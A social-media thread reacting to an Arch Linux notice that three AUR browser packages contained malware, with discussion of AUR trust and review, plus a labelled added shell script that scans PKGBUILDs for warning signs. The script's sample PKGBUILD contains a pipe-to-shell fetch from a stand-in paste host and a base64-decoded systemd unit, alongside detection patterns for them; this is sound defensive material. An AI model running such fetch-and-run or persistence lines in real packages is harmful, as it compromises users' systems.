[aur-general] - [SECURITY] firefox-patch-bin, librewolf-fix-bin and zen-browser-patched-bin AUR packages contained malware

https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/thread/7EZTJXLIAQLARQNTMEW2HBWZYE626IFJ/

#security #linux #ArchLinux

[SECURITY] firefox-patch-bin, librewolf-fix-bin and zen-browser-patched-bin AUR packages contain malware - Aur-general - lists.archlinux.org

@archlinux Is there a backup of those? I wanna take a peek at the PKGBUILD
@fnrir @archlinux these are *-bin packages so I guess the PKGBUILDs probably won't seem suspicious, because the binaries are built before the package creation.

@raspbeguy @fnrir @archlinux > These packages were installing a script [...]

Looks like something in the PKGBUILD itself to me

@archlinux Phew, for a sec I thought it was the 'original' packages. But nope, they sound the same with an additional 'fix' and 'patch' in the name. But still, thanks for the info!
@archlinux nice, isn't it cool how every arch user I've ever met thinks it's totally fine to run arbitrary binaries from strangers, with absolutely no concept of what project packaging is and what official maintainers do

@froge @archlinux

> DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.

Reckless people will do reckless things, users are advised to audit PKGBUILDs and all changes to them.

@gromit @archlinux yeah, but everyone totally ignores or plays down the warnings, there is a culture of blindly trusting the AUR among arch users usually

I'm a long-time contributor to a large Linux community online, and often one of the first things users do on a clean install is set up an AUR helper and blindly pull packages they want

@froge @archlinux Well yes, but from our side users are advised not to use an AUR helper until they know what they're doing ..

But if people continue to ignore advice and good practices and also keep installing stuff with "curl <url> | sh" you maybe just can't help them :D

@gromit @froge @archlinux Love how literally half the time I see an official arch post/talk it contains "Don't trust the AUR and don't/only very carefully use helpers", I'm always agreeing and reinforcing that, yet I run a script to automatically compile over 100 AUR packages inside a docker container where the build user has root access without a password lol
@gromit @froge @archlinux is there an explanation for dumb people like me why it is more unlikely that something like that will happen in the official packages or even in the Debian repository? Like a package maintainer going rogue?
@utf_7 @gromit @archlinux the official repos are managed by trusted maintainers and have a review and quality assurance process which is likely to catch any malicious or incorrect changes

the AUR is simply a list of packages maintained by random people who have free rein to update them whenever they want, with anything they want, without review or checks

using the AUR is a bit like going and installing a random binary from a random github project, without anyone checking the code at all, the official repos have a lot of peer review by people with good reputations in the arch community

@utf_7 Is it possible? Sure. But then the maintainer's credentials are compromised or the maintainer is malicious. For both of them you can remove the maintainer from the project and they generally aren't considered trustworthy anymore if done maliciously.

Since distro packages are signed the provided build/binary and its build script is "vouched for" (to some degree) by the maintainer that signed the package.

@archlinux is there an archive of the PKGBUILD and distributed binary files of the packages so that post-mortem analysis of the attack can be done?

I assume all public downloads of the affected packages have been removed so that people don't install the malware by accident.

@archlinux

Would be interesting to know how these were discovered. Also, is there a semi-official review process that is done on the AUR packages?

@bacteriostat @archlinux In an ideal world, every user would follow the instructions and skim through every PKGBUILD - essentially just a script - they execute. And ofc flag it when they see something malicious. So the users themselves are the reviewers.
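As an added illustration of the "skim the PKGBUILD" advice above (example code, not from the thread, from Arch or from any of the posters): a small POSIX shell triage script that prints the lines of a PKGBUILD a reviewer should read first: URLs that do not point at the declared upstream, network fetches or pipe-to-shell inside build()/package(), decoded or eval'd embedded data, persistence paths such as systemd units or cron, checksums set to SKIP, and an .install hook. The two sample PKGBUILDs it writes are constructed for this example; their package names, URLs and paths are made up, and `example-upstream.org` stands for whatever domain the real upstream releases from.

```shell
#!/bin/sh
# Added example (not from the thread or the Arch project): an offline PKGBUILD
# triage script. It does not replace reading the file; it points a reviewer at
# the lines that deserve a closer look. Names, URLs and paths in the samples
# below are constructed for this illustration.

# write_samples DIR: create one suspicious and one unremarkable sample PKGBUILD.
write_samples() {
  cat > "$1/PKGBUILD.suspect" <<'EOF'
pkgname=example-browser-fix-bin
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("https://example-upstream.org/release/browser-${pkgver}.tar.xz"
        "https://paste.example.net/raw/update.sh")
sha256sums=('SKIP' 'SKIP')
install=example.install

package() {
  install -Dm755 "$srcdir/update.sh" "$pkgdir/usr/lib/example/update.sh"
  curl -fsSL https://paste.example.net/raw/stage2.sh | sh
  echo "aGVsbG8K" | base64 -d > "$pkgdir/usr/lib/systemd/system/example.service"
}
EOF
  cat > "$1/PKGBUILD.clean" <<'EOF'
pkgname=example-browser-bin
pkgver=1.0
pkgrel=1
arch=('x86_64')
source=("https://example-upstream.org/release/browser-${pkgver}.tar.xz")
sha256sums=('0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef')

package() {
  install -Dm755 "$srcdir/browser" "$pkgdir/usr/bin/browser"
}
EOF
}

# flag TAG REGEX FILE: print "line [TAG] text" for every line matching REGEX.
flag() {
  grep -nE "$2" "$3" | while IFS= read -r hit; do
    printf '%s [%s] %s\n' "${hit%%:*}" "$1" "${hit#*:}"
  done
}

# audit_pkgbuild FILE UPSTREAM_DOMAIN: one line per finding on stdout.
audit_pkgbuild() {
  f="$1"; upstream="$2"

  # 1. Any URL whose host is not the declared upstream (a -bin package's
  #    source= array should point at the project's own releases, not a paste site).
  grep -noE 'https?://[^"'"'"' )]+' "$f" | while IFS=: read -r n url; do
    host="${url#*://}"; host="${host%%/*}"
    case "$host" in
      "$upstream"|*".$upstream") ;;
      *) printf '%s [off-domain URL] %s\n' "$n" "$url" ;;
    esac
  done

  # 2. Downloads or pipe-to-shell inside a function (indented lines). makepkg
  #    fetches sources itself; anything a function pulls in bypasses the checksums.
  flag 'fetch-or-pipe-to-shell' \
    '^[[:space:]]+.*(curl|wget|[|][[:space:]]*(ba)?sh([[:space:]]|$))' "$f"

  # 3. Decoding or eval of embedded data: the usual way to hide a payload in a
  #    script that a human is expected to skim.
  flag 'obfuscation' \
    'base64[[:space:]]+(-d|--decode)|(^|[[:space:]])eval[[:space:]]|xxd[[:space:]]+-r' "$f"

  # 4. Persistence: systemd units, cron, shell start-up files, autostart entries.
  flag 'persistence' \
    'systemd/system|systemctl|/etc/cron|/etc/profile|\.bashrc|\.zshrc|xdg/autostart' "$f"

  # 5. Checksums set to SKIP leave the downloaded artefact unverified.
  flag 'checksum SKIP' "'SKIP'" "$f"

  # 6. An .install hook runs as root at install time; read it as well.
  flag 'install hook' '^install=' "$f"
}

# finding_count FILE UPSTREAM_DOMAIN: number of findings, for scripting.
finding_count() {
  audit_pkgbuild "$1" "$2" | wc -l | tr -d ' '
}

# Usage: sh audit-pkgbuild.sh PKGBUILD upstream.example.org
# With no arguments, audit the constructed samples instead.
if [ "$#" -eq 2 ]; then
  audit_pkgbuild "$1" "$2"
else
  demo=$(mktemp -d); write_samples "$demo"
  echo "== PKGBUILD.suspect =="; audit_pkgbuild "$demo/PKGBUILD.suspect" example-upstream.org
  echo "== PKGBUILD.clean: $(finding_count "$demo/PKGBUILD.clean" example-upstream.org) findings =="
  rm -rf "$demo"
fi
```

The checks are deliberately coarse pattern matches, so a hit is a reason to read the line, not a verdict; the absence of hits proves nothing about a PKGBUILD whose sources are a prebuilt binary, which is the case the thread is about. Run it on the diff of an update (the AUR git history) rather than only on the first version you see, since a package that was clean for months can turn in a single pkgrel bump.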

@archlinux

Just thinking out loud, but can't we have a more interesting system to improve the security of the AUR?

My suggestions:

1) Arch packagers can appoint AUR maintainers who are trusted to be benign, maybe by number of packages or votes on packages.

2) Every new AUR package should require to be approved by an AUR maintainer irrespective of the age of account.

@bacteriostat @archlinux

there are not enough people to do this
@bacteriostat @archlinux the whole point of AUR is *not* having this, as compared to official repos.

@archlinux Why would you use a Firefox AUR package, when if you use KDE you can download it from flatpak? I am anyway sceptical of AUR packages.

Or is flatpak just as bad as the AUR?

@1024Bytes @archlinux

and if you don't use KDE, which is most of Arch users?

@m @archlinux
Then you use something else. Gnome or some other DE.

At least I expect lots of people use a DE on Linux. Also, though I haven't tried it, you can run flatpak from a command line as far as I know.

@1024Bytes @archlinux what's the link between KDE and flatpak ?

@squalouJenkins @archlinux Discover uses flatpak. But flatpak is used on many other Linux distros too. It's just what I found on KDE.

Small mistake in my mind.

@1024Bytes @archlinux The Firefox flatpak is maintained by Mozilla and verified on flathub but not all flatpaks are maintained by the upstream developer.
@1024Bytes @archlinux 1. I don't want another package management system
2. I don't want containerization, neither on my Laptop/PC nor on my servers (yes, I also dislike docker, specifically docker)
3. I know makepkg pretty well, flatpak etc. not at all. I can easily read, customize and create PKGBUILDs, but not flatpaks
@archlinux I need to correct myself. You do not need flatpak for Firefox. It's just available in pacman.